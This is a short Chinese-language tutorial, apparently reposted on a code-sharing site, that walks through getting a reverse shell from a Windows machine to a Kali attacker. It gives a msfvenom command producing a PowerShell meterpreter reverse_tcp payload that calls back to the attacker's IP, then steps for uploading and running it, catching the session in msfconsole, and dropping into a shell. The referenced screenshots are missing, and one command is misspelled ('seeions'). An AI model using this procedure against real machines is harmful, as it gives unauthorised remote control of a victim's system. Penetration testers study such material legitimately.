利用powerShell 反彈shell到metasploit


一、使用工具kali linux,windows severe msfvenom msfconsole

二、使用msfvenom生成ps1格式的Powershell腳本

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXXXX(你自己kali本機IP) LPORT=XXXX(自己隨便設置) -f psh-reflection >xxx.ps1

將生成的Powershell腳本下載並上傳至windows機器中

三、啟動Msfconsole

選擇模塊

設置payload

設置完成后執行run

在windows機器中執行powershell腳本,此時攻擊機器中會顯示如果下結果

 

如果攻擊主機中顯示通道已經建立但是未拿到相應的shell 如圖:

 回車進入:

msf exploit(handler)> 

輸入:sessions -l 查看信息

 

輸入 seeions 1 就會拿到想要的meterpreter

 

在meterpreter中輸入shell 即可拿到相應的shell

后續可以操作 一些相關命令。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM